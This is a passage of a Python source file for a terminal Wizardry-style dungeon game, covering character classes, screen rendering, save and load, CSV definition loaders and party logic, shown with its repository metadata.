[ { "alpha_fraction": 0.44780054688453674, "alphanum_fraction": 0.46292445063591003, "avg_line_length": 36.05898666381836, "blob_id": "9fe3f35f08305837732f4b88398eafb734aac973", "content_id": "3377c9e7c074d3718ed4788d9f295a73bb7f8436", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 186592, "license_type": "permissive", "max_line_length": 342, "num_lines": 5035, "path": "/dl.py", "repo_name": "Kuiteland/daemonlord", "src_encoding": "UTF-8", "text": "import pickle\nimport re\nimport textwrap\nimport time\nimport random\nimport os\nimport sys\nimport struct\nimport tty\nfrom enum import Enum\nimport fcntl\nimport json\nimport csv\nfrom operator import itemgetter, attrgetter\nimport itertools\nimport collections\nif os.name == 'nt':\n import msvcrt # Windows\n os_windows = True\nelse:\n import termios # Mac & Linux\n os_windows = False\n\nconfig = {\n 'debug': False,\n}\n\n\nclass Job(Enum):\n FIGHTER, MAGE, PRIEST, THIEF, BISHOP, SAMURAI, LORD, NINJA, UNEMPLOYED = range(\n 9)\n\n\nclass Race(Enum):\n HUMAN, ELF, DWARF, GNOME, HOBBIT = range(5)\n\n\nclass State(Enum):\n OK, ASLEEP, PARALYZED, STONED, DEAD, ASHED, LOST = range(7)\n\n\nclass Align(Enum):\n GOOD, NEUTRAL, EVIL = range(3)\n\n\nclass Place(Enum):\n MAZE, EDGE_OF_TOWN, TRAINING_GROUNDS, CASTLE, HAWTHORNE_TAVERN, TRADER_JAYS, LAKEHOUSE_INN, MGH, CAMP, BATTLE, LEAVE_GAME = range(\n 11)\n\n\nclass Trap(Enum):\n TRAPLESS_CHEST, POISON_NEEDLE, CROSSBOW_BOLT, GAS_BOMB, STUNNER, EXPLODING_BOX, TELEPORTER, MAGE_BLASTER, PRIEST_BLASTER, ALARM = range(\n 10)\n\n\nclass Eventid(Enum):\n RNDMSG, KEY, BOSS = range(\n 3)\n\n\nclass Evloctype(Enum):\n RANDOM, DOWNSTAIRS = range(2)\n\n\nrace_status = {\n Race.HUMAN: (8, 8, 5, 8, 8, 9),\n Race.ELF: (7, 10, 10, 6, 9, 6),\n Race.DWARF: (10, 7, 10, 10, 5, 6),\n Race.GNOME: (7, 7, 10, 8, 10, 7),\n Race.HOBBIT: (5, 7, 7, 6, 10, 15),\n}\n\njob_requirements = {\n Job.FIGHTER: (11, 0, 0, 0, 0, 0, (True, True, True)),\n Job.MAGE: (0, 11, 0, 0, 0, 0, (True, True, True)),\n Job.PRIEST: (0, 0, 11, 0, 0, 0, (True, False, True)),\n Job.THIEF: (0, 0, 0, 0, 11, 0, (False, True, True)),\n Job.BISHOP: (0, 12, 12, 0, 0, 0, (True, False, True)),\n Job.SAMURAI: (15, 11, 10, 14, 10, 0, (True, True, False)),\n Job.NINJA: (15, 17, 15, 16, 15, 16, (False, False, True)),\n Job.LORD: (15, 12, 12, 15, 14, 15, (True, False, False)),\n}\n\nlevel_table = {\n Job.FIGHTER: (1000, 1724, 2972, 5124, 8834, 15231, 26260, 45275, 78060, 134586, 232044, 400075, 289709),\n Job.MAGE: (1100, 1896, 3268, 5634, 9713, 16746, 28872, 49779, 85825, 147974, 255127, 439874, 318529),\n Job.PRIEST: (1050, 1810, 3120, 5379, 9274, 15989, 27567, 47529, 81946, 141289, 243596, 419993, 304132),\n Job.THIEF: (900, 1551, 2674, 4610, 7948, 13703, 23625, 40732, 70227, 121081, 208760, 359931, 260326),\n Job.BISHOP: (1200, 2105, 3692, 6477, 11363, 19935, 34973, 61356, 107642, 188845, 331307, 581240, 438479),\n Job.SAMURAI: (1250, 2192, 3845, 6745, 11833, 20759, 36419, 63892, 112091, 196650, 345000, 605263, 456601),\n Job.LORD: (1300, 2280, 4000, 7017, 12310, 21596, 37887, 66468, 116610, 204578, 358908, 629663, 475008),\n Job.NINJA: (1450, 2543, 4461, 7829, 13729, 24085, 42254, 74179, 130050, 228157, 400275, 702236, 529756),\n}\n\nrandom_messages = [\n [\"You hear a loud noise from south.\",\n \"You wondered if monsters are fighting down there.\"],\n [\"You see a herd of mice.\",\n \"These mice are devoring a human-like figure.\",\n \"You noticed a pugent smell of blood.\"],\n [\"You've lost a sense 
of time since you came down to this dungeon.\",\n \"Is it still early afternoon? Or is it already late at night?\"],\n [\"It is hot and moist around this area.\",\n \"You've become very thirsty. Do we have sufficient water with us?\"],\n [\"You found a piece of paper.\",\n \"You read: 'Her name is Anna. She is dangerous. You must run away from her while you still can.'\"],\n [\"You saw a word 'Help!' carved on the wall.\",\n \"Probably you are way too late for the rescue.\"],\n [\"You saw scratches on the stone wall.\",\n \"Were these made with sharp claws of a monster?\"],\n [\"Look out!\",\n \"You almost caught in a deep pitfall.\",\n \"You saw some dead bodies and bones at the bottom.\"],\n [\"You found some words on the surface of a wooden board.\",\n \"'Please, more light, &%*&#'\"],\n [\"Watch out!\",\n \"An arrow flew from your left and hit the stone wall.\"],\n [\"You found a strange nutcracker.\",\n \"It started talking in a high piched voice.\",\n \"'You are doomed. Go back while you can.'\"],\n [\"You found someone's journal. On the last page, you read:\",\n \"'I would pay a millon gold if I could see sun light again.'\"],\n [\"You heard a voice in your head.\",\n \"'Do you know that this dungeon is a playground of the Lord?'\",\n \"'Do you think that you know what you are doing?'\"],\n [\"It's frigid in this area.\",\n \"Is there an icy monster around here?\"],\n [\"There should be other adventurers in this dungeon.\",\n \"You wondered why you don't see anyone else.\"],\n [\"You just wish you could stay in a better room tonight.\",\n \"You are fed up with cabbage soup for dinner.\"],\n [\"You find a message board saying:\",\n \"'From north west to south east. Just keep walking to south east, fool!'\"],\n [\"You heard a voice in your head:\",\n \"'You are penetrating the Lords territory.'\",\n \"'It will cost you your lives.'\"],\n]\n\n\nclass Vscr:\n \"\"\"\n Manage and control scroll window and virtual scroll windows\n \"\"\"\n\n def __init__(self, width, height):\n self.width = width\n self.height = height\n self.vscr0 = bytearray(b'P'*width*height)\n self.vscr1 = bytearray(b'Q'*width*height)\n self.prev_vscr_view = memoryview(self.vscr0)\n self.cur_vscr_view = memoryview(self.vscr1)\n self.meswins = []\n\n def draw_map(self, party, floor_obj):\n \"\"\"\n Copy map data to a virtual scroll window\n \"\"\"\n floor_view = memoryview(floor_obj.floor_data)\n cv = self.cur_vscr_view\n w = self.width\n for cy in range(self.height):\n cv[cy*w:(cy+1)*w] = b'^'*w # fill with rocks\n my = party.y - (self.height-7)//2 + cy # convert cy to floor_y\n if 0 <= my < floor_obj.y_size:\n l_left = min(0, party.x-w//2) * -1\n l_right = min(w, floor_obj.x_size - party.x + w//2)\n map_left = my*floor_obj.x_size + party.x - w//2 + l_left\n map_right = map_left + l_right - l_left\n cv[cy*w+l_left:cy*w+l_right] = floor_view[map_left:map_right]\n if cy == (self.height-7)//2:\n cv[cy*w+w//2:cy*w+w//2+1] = b'@'\n\n def cls(self):\n \"\"\"\n clear both vscr0 and vscr1, and force clear screen\n \"\"\"\n self.cur_vscr_view[:] = b' ' * self.width * self.height\n self.prev_vscr_view[:] = b' ' * self.width * self.height\n self.display(force=True)\n\n def display(self, force=False):\n \"\"\"\n Actually print current virtual screen on the terminal and\n flip virtual screens for the next display.\n Caution: Do not call this method directly. 
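Vscr.display() here implements double-buffered rendering: the frame is drawn into cur_vscr_view, each row is compared with prev_vscr_view, only the rows that changed are repainted with an ANSI cursor-positioning escape, and the two buffers are then swapped. A self-contained sketch of that diff-and-flip idea:

```python
import sys

def diff_draw(cur, prev, width, height):
    # Repaint only the rows that changed since the last frame, using
    # "\033[row;colH" to move the cursor, as Vscr.display() does.
    for y in range(height):
        row = slice(y * width, (y + 1) * width)
        if cur[row] != prev[row]:
            sys.stdout.write(f"\033[{y + 1};1H{cur[row].decode()}")
    sys.stdout.flush()

w, h = 4, 2
prev = bytearray(b"....####")
cur = bytearray(b"....@@##")
diff_draw(cur, prev, w, h)        # only the second row is reprinted
cur, prev = prev, cur             # flip buffers for the next frame
```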
Use disp_scrwin() instead.\n \"\"\"\n cv = self.cur_vscr_view\n w = self.width\n for y in range(self.height):\n slc = slice(y*w, (y+1)*w)\n if force == True or cv[slc] != self.prev_vscr_view[slc]:\n print(f\"\\033[{y+1};0H{cv[slc].tobytes().decode()}\", end='')\n self.cur_vscr_view, self.prev_vscr_view = \\\n self.prev_vscr_view, self.cur_vscr_view\n\n def draw_meswins(self):\n \"\"\"\n Display the message window\n \"\"\"\n for mw in self.meswins:\n meswidth = mw.width - 2\n if mw.frame:\n meswidth -= 4\n for y in range(mw.height):\n if len(mw.mes_lines) <= y:\n line = ' '*(meswidth)\n else:\n line = mw.mes_lines[y].ljust(meswidth)\n if mw.frame:\n line = ''.join(['| ', line, ' |'])\n line = line.encode()\n vscr_left = (mw.y+y)*self.width + mw.x\n self.cur_vscr_view[vscr_left:vscr_left+len(line)] = line\n\n def draw_partywin(self, party):\n \"\"\"\n Show the party window\n \"\"\"\n for y in range(7):\n line = \" # name class ac hp status \"\n width = len(line)\n if y != 0:\n if len(party.members) >= y:\n m = party.members[y-1]\n hpchar = ' '\n if m.hpplus > 0:\n hpchar = '+'\n elif m.hpplus < 0:\n hpchar = '-'\n alcls = ''.join([m.align.name[0], '-', m.job.name[:3]])\n ac = m.ac + party.ac\n if party.place == Place.BATTLE:\n ac += m.acplus\n if party.place == Place.BATTLE and \\\n m.state in [State.OK]:\n line = f\" {y} {m.name[:10].ljust(10)} {alcls} {ac:3d} {m.hp:4d}{hpchar}{m.action.ljust(13)}\"\n else:\n if m.poisoned and m.state == State.OK:\n line = f\" {y} {m.name[:10].ljust(10)} {alcls} {ac:3d} {m.hp:4d}{hpchar}{'POISONED'.ljust(13)}\"\n else:\n line = f\" {y} {m.name[:10].ljust(10)} {alcls} {ac:3d} {m.hp:4d}{hpchar}{m.state.name[:13].ljust(13)}\"\n else:\n line = f\" {y}\" + ' '*(width-2)\n line = line.encode()\n vscr_left = (self.height-7+y)*self.width\n self.cur_vscr_view[vscr_left:vscr_left+len(line)] = line\n\n def draw_header(self, party):\n \"\"\"\n Display the header info\n \"\"\"\n if party.gps:\n line = f\" daemon lord - dl - [{party.place.name.lower()}] floor:{party.floor:2d} ({party.x:3d}/{party.y:3d}) \"\n else:\n line = f\" daemon lord - dl - [{party.place.name.lower()}] floor:?? (???/???) \"\n if party.identify:\n line = line + \"<identify> \"\n if party.light_cnt:\n line = line + \"<light> \"\n self.cur_vscr_view[:len(line)] = line.encode()\n\n def disp_scrwin(self, floor_obj=None):\n \"\"\"\n Display scroll window main\n \"\"\"\n game = self.game\n start = time.time()\n party = game.party\n if not floor_obj:\n floor_obj = party.floor_obj\n view_range = 1\n if party.light_cnt > 0:\n view_range = 2\n if party.place == Place.MAZE or party.place == Place.CAMP:\n for y in range(party.y-view_range, party.y+view_range+1):\n for x in range(party.x-view_range, party.x+view_range+1):\n floor_obj.put_tile(\n x, y, floor_obj.get_tile(x, y), orig=False)\n self.draw_map(party, floor_obj)\n self.draw_partywin(party)\n self.draw_header(party)\n self.draw_meswins()\n self.display()\n delta = time.time() - start\n try:\n print(\n f\"\\033[{self.height};0H\", end='', flush=True)\n except:\n pass\n\n\nclass Meswin:\n \"\"\"\n Message window. 
A message line starts with \"* \".\n \"\"\"\n\n def __init__(self, vscr, x, y, width, height, frame=False):\n self.vscr = vscr\n self.width = min(width, vscr.width)\n self.height = min(height, vscr.height)\n self.x = x\n self.y = y\n self.cur_x = 0 # cursor position in message area\n self.cur_y = 0\n self.frame = frame\n self.show = False\n self.mes_lines = []\n self.cls()\n\n def change(self, x, y, width, height):\n \"\"\"\n Change size and position of message window\n \"\"\"\n self.x = x\n self.y = y\n self.width = min(width, self.vscr.width)\n self.height = min(height, self.vscr.height)\n\n def cls(self):\n # clear message area\n self.mes_lines = []\n\n def print(self, msg, start='*'):\n \"\"\"\n Print a message in the message window. Long text wraps\n to the next line. Process '\\n' in texts.\n \"\"\"\n meswidth = self.width - 2\n if self.frame:\n meswidth -= 5\n\n sublines = re.split('\\n', msg)\n for idx, sl in enumerate(sublines): # subline\n header = ' '\n if idx == 0:\n header = start + ' '\n ssls = textwrap.wrap(sl, width=meswidth-1)\n if len(ssls) == 0:\n self.mes_lines.append(header)\n else:\n for ssl in ssls:\n self.mes_lines.append(''.join([header, ssl]))\n header = ' '\n if len(self.mes_lines) > self.height:\n self.mes_lines = self.mes_lines[len(\n self.mes_lines)-self.height:]\n self.cur_y = len(self.mes_lines)-1\n self.show = True\n\n def input(self, msg):\n \"\"\"\n Input a string in the message window.\n \"\"\"\n self.print(msg)\n self.print('', start='>')\n # self.vscr.draw_meswins()\n # self.vscr.display()\n self.vscr.disp_scrwin()\n print(f\"\\033[{self.y+self.cur_y+1};{self.x+5}H\", end='', flush=True)\n try:\n value = input()\n self.mes_lines[self.cur_y] = \"> \" + value\n except:\n pass\n return value\n\n def input_char(self, msg, values=[]):\n \"\"\"\n Input a character in the message window.\n \"\"\"\n ch = ''\n while ch not in values:\n self.print(msg+' >', start=' ')\n self.vscr.disp_scrwin()\n print(f\"\\033[{self.y+self.cur_y+1};{self.x+len(msg)+8}H\",\n end='', flush=True)\n ch = getch()\n l = self.mes_lines.pop()\n self.print(''.join([l, ' ', ch])[2:], start=' ')\n self.vscr.disp_scrwin()\n if not values:\n break\n return ch\n\n\nclass Game:\n def __init__(self):\n self.characters = [] # registerd characters\n self.hospitalized = [] # members in the hospital\n self.party = None\n self.vscr = None\n self.dungeon = None\n self.spell = None\n self.battle = None\n\n def save(self):\n \"\"\"\n Save game status for later resume. If saved in dungeon,\n it saves floor objects as well. As pickling party object\n resulted in an error (memoryview can't be pickled), convert\n it to a tuple first. 
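Meswin.print() above wraps long messages: it honors embedded newlines via re.split, wraps each piece with textwrap to the usable window width, and puts the start marker ('* ' by default) only on the very first physical line. A standalone sketch of that wrapping step:

```python
import re
import textwrap

def wrap_message(msg, width, start='*'):
    # Standalone sketch of Meswin.print()'s wrapping: honor embedded
    # newlines, wrap each piece, and put the start marker only on the
    # first physical line (continuations get a plain space header).
    lines = []
    header = start + ' '
    for part in re.split('\n', msg):
        for piece in textwrap.wrap(part, width=width - 1) or ['']:
            lines.append(header + piece)
            header = ' '
    return lines

print(wrap_message("You found a key.\nIt looks ancient and heavy.", 20))
```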
floor_obj has memoryview variable, too.\n \"\"\"\n self.savedata = []\n self.savedata.append(self.characters)\n\n p = self.party\n ptpl = (p.x, p.y, p.px, p.py, p.floor, p.pfloor,\n p.light_cnt, p.ac, p.gps, p.place, p.silenced, p.identify)\n self.savedata.append(ptpl)\n mems = [] # list of names\n for mem in self.party.members:\n mems.append(mem.name)\n self.savedata.append(mems)\n\n self.savedata.append(self.shopitems)\n\n if p.place in [Place.MAZE, Place.CAMP, Place.BATTLE]:\n self.savedata.append(self.dungeon.events)\n for f in self.dungeon.floors:\n ftpl = (f.x_size, f.y_size, f.floor, f.up_x, f.up_y,\n f.down_x, f.down_y, f.floor_data, f.floor_orig,\n f.rooms, f.battled, f.events)\n self.savedata.append(ftpl)\n self.savedata.append(None)\n with open('savedata.pickle', 'wb') as f:\n pickle.dump(self.savedata, f)\n\n def load(self):\n \"\"\"\n Load savedata.pickle to resume game.\n \"\"\"\n try:\n with open('savedata.pickle', 'rb') as f:\n self.savedata = pickle.load(f)\n except:\n return False\n self.characters = self.savedata.pop(0)\n\n ptup = self.savedata.pop(0)\n self.load_party(ptup)\n mems = self.savedata.pop(0)\n self.party.members = []\n for mem in mems:\n for ch in self.characters:\n if mem == ch.name:\n self.party.members.append(ch)\n\n self.shopitems = self.savedata.pop(0)\n\n if self.party.place not in [Place.MAZE, Place.CAMP, Place.BATTLE]:\n return\n\n self.dungeon.events = self.savedata.pop(0)\n self.dungeon.floors = []\n while True:\n ftpl = self.savedata.pop(0)\n if not ftpl:\n break\n x_size, y_size, floor, up_x, up_y, down_x, down_y, floor_data, floor_orig, rooms, battled, events = ftpl\n f = Floor(x_size, y_size, floor, floor_data)\n f.up_x, f.up_y = up_x, up_y\n f.down_x, f.down_y = down_x, down_y\n f.floor_orig = floor_orig\n f.floor_data = floor_data\n f.rooms = rooms\n f.battled = battled\n f.events = events\n self.dungeon.floors.append(f)\n self.party.floor_obj = self.dungeon.floors[self.party.floor-1]\n return True\n\n def load_party(self, ptup):\n p = self.party\n p.x, p.y, p.px, p.py, p.floor, p.pfloor, p.light_cnt, p.ac, p.gps, \\\n p.place, p.silenced, p.identify = ptup\n if p.place in [Place.MAZE, Place.CAMP, Place.BATTLE]:\n p.resumed = True # resume flag\n\n def load_monsterdef(self):\n \"\"\"\n load monster definition file\n As fellow monster in csv is wizname, convert to dl name\n \"\"\"\n Monster = collections.namedtuple(\n 'Monster', ['names', 'unident', 'unidents', 'type',\n 'level', 'hp', 'ac', 'attack', 'count', 'act',\n 'poison', 'paraly',\n 'stone', 'critical', 'drain', 'breathsp', 'heal',\n 'regdeathp', 'regfire', 'regcold', 'regpoison',\n 'regspellp', 'weakmaka', 'weaksleep', 'friendly',\n 'exp', 'number', 'floors', 'fellow', 'fellowp',\n 'agi', 'treasure'])\n Tmpmonster = collections.namedtuple(\n 'Tmpmonster', ['name', 'names', 'unident', 'unidents', 'type',\n 'level', 'hp', 'ac', 'attack', 'count', 'act1',\n 'act2', 'act3', 'act4', 'act5', 'poison', 'paraly',\n 'stone', 'critical', 'drain', 'breathsp', 'heal',\n 'regdeathp', 'regfire', 'regcold', 'regpoison',\n 'regspellp', 'weakmaka', 'weaksleep', 'friendly',\n 'exp', 'number', 'floors', 'fellowwiz', 'fellowp',\n 'agi', 'treasure'])\n with open('monsters.csv') as csvfile:\n rdr = csv.reader(csvfile)\n tmp_dic = {}\n for i, row in enumerate(rdr):\n if i == 0:\n continue\n try:\n level = int(row[7])\n except:\n level = 1\n try:\n ac = int(row[9])\n except:\n ac = 10\n try:\n count = int(row[11])\n except:\n count = 1\n poison = False\n if row[17].lower() == 'true':\n poison = True\n paraly 
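Game.save()'s docstring notes the reason for the tuple round-trip: memoryview objects (held by Party and Floor) can't be pickled. A tiny sketch demonstrating the failure and the plain-data workaround:

```python
import pickle

buf = bytearray(b"....####")
view = memoryview(buf)

try:
    pickle.dumps(view)            # raises TypeError: cannot pickle 'memoryview'
except TypeError as err:
    print("pickle failed:", err)

# dl.py's workaround: persist only plain data (tuples, bytearrays, lists)
# and rebuild the memoryview-holding objects after loading.
snapshot = bytes(buf)             # picklable stand-in for the buffer
restored = memoryview(bytearray(pickle.loads(pickle.dumps(snapshot))))
```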
= False\n if row[18].lower() == 'true':\n paraly = True\n stone = False\n if row[19].lower() == 'true':\n stone = True\n critical = False\n if row[20].lower() == 'true':\n critical = True\n try:\n drain = int(row[21])\n except:\n drain = 0\n try:\n heal = int(row[23])\n except:\n heal = 0\n try:\n regdeathp = int(row[24])\n except:\n regdeathp = 0\n regfire = False\n if row[25].lower() == 'true':\n regfire = True\n regcold = False\n if row[26].lower() == 'true':\n regcold = True\n regpoison = False\n if row[27].lower() == 'true':\n regpoison = True\n try:\n regspellp = int(row[28])\n except:\n regspellp = 0\n weakmaka = False\n if row[29].lower() == 'true':\n weakmaka = True\n weaksleep = False\n if row[30].lower() == 'true':\n weaksleep = True\n friendly = False\n if row[31].lower() == 'true':\n friendly = True\n try:\n exp = int(row[32])\n except:\n exp = 0\n floors = row[34] # floors\n if floors == '':\n floors = {999}\n else:\n floors_tmp = re.split(r',\\s*', floors)\n floors = set()\n for floor in floors_tmp:\n try:\n floor = int(floor)\n except:\n floor = 999\n floors.add(floor)\n try:\n fellowp = int(row[36])\n except:\n fellowp = 0\n try:\n agi = int(row[37])\n except:\n agi = 10\n treasure = row[38]\n if treasure == '':\n treasure = []\n else:\n treasure_tmp = re.split(r',\\s*', treasure)\n treasure = []\n for level in treasure_tmp:\n try:\n level = int(level)\n treasure.append(level)\n except:\n pass\n tmp_monster \\\n = Tmpmonster(row[2], row[3], row[4], row[5], row[6],\n level, row[8], ac, row[10], count, row[12],\n row[13], row[14], row[15], row[16], poison, paraly,\n stone, critical, drain, row[22], heal,\n regdeathp, regfire, regcold, regpoison,\n regspellp, weakmaka, weaksleep, friendly,\n exp, row[33], floors, row[35], fellowp, agi,\n treasure)\n tmp_dic[row[1]] = tmp_monster\n\n monster_def = {}\n for wizname, m in tmp_dic.items():\n if m.fellowwiz == '':\n fellow = ''\n else:\n fellow = tmp_dic[m.fellowwiz].name\n monster = Monster(m[1], m[2], m[3], m[4], m[5], m[6], m[7], m[8],\n m[9], (m[10], m[11], m[12], m[13], m[14]), m[15],\n m[16], m[17], m[18], m[19], m[20], m[21], m[22],\n m[23], m[24], m[25], m[26], m[27], m[28], m[29],\n m[30], m[31], m[32], fellow, m[34], m[35], m[36])\n monster_def[m.name] = monster\n self.mondef = monster_def\n\n def load_spelldef(self):\n \"\"\"\n load spell definition file\n \"\"\"\n Spell = collections.namedtuple(\n 'Spell', ['categ', 'level', 'battle', 'camp', 'type', 'target', 'value', 'attr', 'desc'])\n with open('spells.csv') as csvfile:\n rdr = csv.reader(csvfile)\n spell_def = {}\n for i, row in enumerate(rdr):\n if i == 0:\n continue\n attr = self.cell2strtup(row[10])\n # (0categ, 1level, 2battle, 3camp, 4type, 5target, 6value,\n # 7attr, 8desc)\n spell = Spell(row[1], int(row[2]), json.loads(row[5].lower()),\n json.loads(row[6].lower()), row[7], row[8], row[9], attr, row[12])\n spell_def[row[3]] = spell\n self.spelldef = spell_def\n\n def load_itemdef(self):\n \"\"\"\n load item definition file\n \"\"\"\n Item = collections.namedtuple(\n 'Item', ['level', 'unident', 'type', 'range', 'jobs', 'ac',\n 'st', 'at', 'dice', 'shop', 'price', 'curse',\n 'hp', 'use', 'brk', 'regist', 'twice', 'align',\n 'sp', 'target'])\n\n with open('items.csv') as csvfile:\n rdr = csv.reader(csvfile)\n item_def = {}\n for i, row in enumerate(rdr):\n if i == 0 or not row:\n continue\n try:\n level = int(row[1])\n except:\n level = 0\n if not (name := row[2]):\n name = row[4]\n if not (unident := row[3]):\n unident = row[5]\n try:\n ac = int(row[9])\n 
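load_monsterdef() repeats the same try/int/except-default pattern for every numeric column and a string comparison for every boolean column. Two small helpers capture those conventions; this is a refactoring sketch, not code from dl.py:

```python
def to_int(cell, default=0):
    # Fallback-int conversion, equivalent to the repeated try/except
    # blocks: empty or malformed CSV cells yield the default.
    try:
        return int(cell)
    except (TypeError, ValueError):
        return default

def to_bool(cell):
    # The CSVs encode booleans as the strings 'TRUE'/'true'.
    return str(cell).lower() == 'true'

assert to_int('42') == 42 and to_int('', 10) == 10
assert to_bool('TRUE') and not to_bool('')
```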
except:\n ac = 0\n try:\n st = int(row[10])\n except:\n st = 0\n try:\n at = int(row[11])\n except:\n at = 0\n try:\n shop = int(row[13])\n except:\n shop = 0\n try:\n price = int(row[14])\n except:\n price = 0\n if row[15] == 'TRUE':\n curse = True\n else:\n curse = False\n try:\n hp = int(row[16])\n except:\n hp = 0\n try:\n brk = int(row[18])\n except:\n brk = 0\n regist = self.cell2strtup(row[19])\n twice = self.cell2strtup(row[20])\n align = self.cell2strtup(row[21])\n # (0level, 1unident, 2type, 3range, 4jobs, 5ac, 6st, 7at,\n # 8dice, 9shop, 10price, 11curse, 12hp, 13use, 14brk,\n # 15regist, 16twice, 17align, 18sp, 19target)\n item = Item(level, unident, row[6], row[7], row[8], ac,\n st, at, row[12], shop, price,\n curse, hp, row[17], brk, regist, twice, align,\n row[22], row[23])\n item_def[name] = item\n self.itemdef = item_def\n self.shopitems = {}\n for name in self.itemdef:\n self.shopitems[name] = self.itemdef[name].shop\n\n def cell2strtup(self, cell):\n if cell == '':\n rtn = ()\n else:\n tmp = re.split(r',\\s*', cell)\n rtn = []\n for t in tmp:\n rtn.append(t)\n rtn = tuple(rtn)\n return rtn\n\n\nclass Party:\n # Represents a party\n def __init__(self, x, y, floor):\n self.x = self.px = x\n self.y = self.py = y\n self.floor = self.pfloor = floor\n self.tsubasa_floor = 1 # to which floor? (valid when floor_move=3)\n self.floor_move = 0 # floor move flag\n self.resumed = False # resume flag\n self.place = Place.EDGE_OF_TOWN\n self.floor_obj = ''\n self.members = []\n self.light_cnt = 0 # milwa=+30-45, lomilwa=+9999\n self.ac = 0 # -2 if maporfic\n self.silenced = False # can't cast spell\n self.identify = False # latumapic\n self.gps = False # eternal dumapic\n\n def injured(self):\n \"\"\"\n Check if someone is injured and return True/False\n dead, ashed, lost members are not counted\n \"\"\"\n for mem in self.members:\n if mem.state in [State.DEAD, State.ASHED, State.LOST]:\n continue\n if mem.hp < mem.maxhp:\n return True\n return False\n\n def cast_spell(self, game, spell, target='party'):\n \"\"\"\n If someone can cast the spell, cast it and return True\n If not, return False\n Only support heal and etc spells for now\n \"\"\"\n for mem in self.members:\n if mem.state in [State.DEAD, State.ASHED, State.LOST]:\n continue\n if game.spell.cancast(mem, spell, consume=True):\n game.vscr.meswins[-1].print(f\"{mem.name} casted {spell}\")\n if spell in ['gps', 'hogo', 'shikibetsu', 'hikarinotama']:\n game.spell.etc(mem, spell, target)\n else:\n game.spell.heal(mem, spell, target)\n game.vscr.disp_scrwin()\n getch(wait=True)\n return True\n return False\n\n def prep(self, game):\n \"\"\"\n Cast hogo, shikibetsu, gps and lomilwa\n \"\"\"\n if self.ac == 0:\n self.cast_spell(game, 'hogo')\n if not self.identify:\n self.cast_spell(game, 'shikibetsu')\n if not self.gps:\n self.cast_spell(game, 'gps')\n if self.light_cnt < 1000:\n self.cast_spell(game, 'hikarinotama')\n\n def heal(self, game):\n \"\"\"\n Heal all members in the party\n \"\"\"\n while self.injured():\n if not self.cast_spell(game, 'zenkai'):\n if not self.cast_spell(game, 'zenjiai'):\n break\n for mem in self.members:\n if mem.state in [State.DEAD, State.ASHED, State.LOST]:\n continue\n if mem.hp == mem.maxhp:\n continue\n if not self.cast_spell(game, 'kanzen', mem):\n if not self.cast_spell(game, 'daikaifuku', mem):\n if not self.cast_spell(game, 'iyashi', mem):\n if not self.cast_spell(game, 'jiai', mem):\n return\n\n def defeated(self):\n \"\"\"\n Party defeat check after a battle, a boss battle or a chest\n 
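Game.cell2strtup() above turns a comma-separated CSV cell into a tuple of strings, with the empty cell mapping to an empty tuple. The same behavior fits in one expression (an equivalent sketch):

```python
import re

def cell2strtup(cell):
    # One-expression equivalent of Game.cell2strtup().
    return tuple(re.split(r',\s*', cell)) if cell else ()

assert cell2strtup('fire, cold') == ('fire', 'cold')
assert cell2strtup('') == ()
```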
\"\"\"\n if sum(1 for m in self.members\n if m.state in [State.OK, State.ASLEEP]):\n return False # at least one survives\n return True # defeated\n\n def move(self, x, y, floor=None):\n \"\"\"\n Move party to the specified (x, y) and optional floor\n \"\"\"\n self.px = self.x\n self.py = self.y\n self.x = x\n self.y = y\n self.pfloor = self.floor\n if floor:\n self.floor = floor\n\n def calc_hpplus(self, game):\n for mem in self.members:\n mem.hpplus = sum(game.itemdef[item[0]].hp for item in mem.items)\n if mem.poisoned:\n mem.hpplus -= 1\n\n def consume_item(self, item):\n \"\"\"\n Consume one item in the party member inventory\n \"\"\"\n for mem in self.members:\n if item in mem.items:\n mem.items.remove(item)\n break\n\n def have_items(self, itemlist):\n \"\"\"\n Return True someone in the party has one in itemlist\n \"\"\"\n for it in itemlist:\n if it in [item[0] for mem in self.members\n for item in mem.items]:\n return True\n return False\n\n def reorder(self, game):\n \"\"\"\n Reorder party members\n \"\"\"\n v = game.vscr\n mw = v.meswins[-1]\n dst = []\n idx = 1\n while True:\n c = mw.input_char(f\"Who comes #{idx}? - # or l)eave\")\n if c == 'l':\n break\n try:\n i = int(c)\n mem = self.members[i-1]\n except:\n mw.print(\"What?\")\n continue\n if mem in dst:\n mw.print(\"Already chosen.\")\n continue\n dst.append(mem)\n if len(dst) == len(self.members):\n self.members = dst\n break\n idx += 1\n\n def pay(self, gold):\n \"\"\"\n Pay the price as a party. Each member tries to pay their\n share but if they can't afford, someone will pay.\n \"\"\"\n total = 0\n for mem in self.members:\n total += mem.gold\n if total < gold:\n return False # Can't afford\n\n num = len(self.members)\n each = gold // num\n remain = gold % num\n for mem in self.members:\n if mem.gold >= each:\n mem.gold -= each\n else:\n remain += each - mem.gold\n mem.gold = 0\n\n for mem in self.members:\n if mem.gold >= remain:\n mem.gold -= remain\n return True\n else:\n remain -= mem.gold\n mem.gold = 0\n\n def can_open(self, game, ch=b'*'):\n \"\"\"\n Check if they can unlock the door\n Returns True if they can, False otherwise\n \"\"\"\n if ch == b'%':\n if game.party.floor == 3:\n keys = ['ivory key', 'bronze key', 'silver key', 'gold key']\n elif game.party.floor == 6:\n keys = ['bronze key', 'silver key', 'gold key']\n elif game.party.floor == 9:\n keys = ['silver key', 'gold key']\n elif game.party.floor == 10:\n keys = ['gold key']\n elif game.party.floor >= 11:\n keys = ['one time password']\n if game.party.have_items(keys):\n return True\n return False\n\n lvl = 1\n for mem in self.members:\n if mem.job in [Job.THIEF, Job.NINJA]:\n lvl = max(lvl, mem.level)\n else:\n lvl = max(lvl, mem.level//5+1)\n chance = max((lvl+1-self.floor)*10, 5)\n if random.randrange(100) < chance:\n return True\n else:\n return False\n\n def choose_character(self, game):\n \"\"\"\n Choose and return a party member\n Return False if not chosen\n \"\"\"\n mw = game.vscr.meswins[-1]\n while True:\n ch = mw.input_char(f\"Who? - # or l)eave\")\n if ch == 'l':\n break\n try:\n if 0 <= (chid := int(ch)-1) < len(game.party.members):\n break\n except:\n pass\n if ch == 'l':\n return False\n return self.members[chid]\n\n def remove_character(self, game):\n \"\"\"\n Choose and remove a party member\n \"\"\"\n mw = game.vscr.meswins[-1]\n while True:\n ch = mw.input_char(f\"Remove who? 
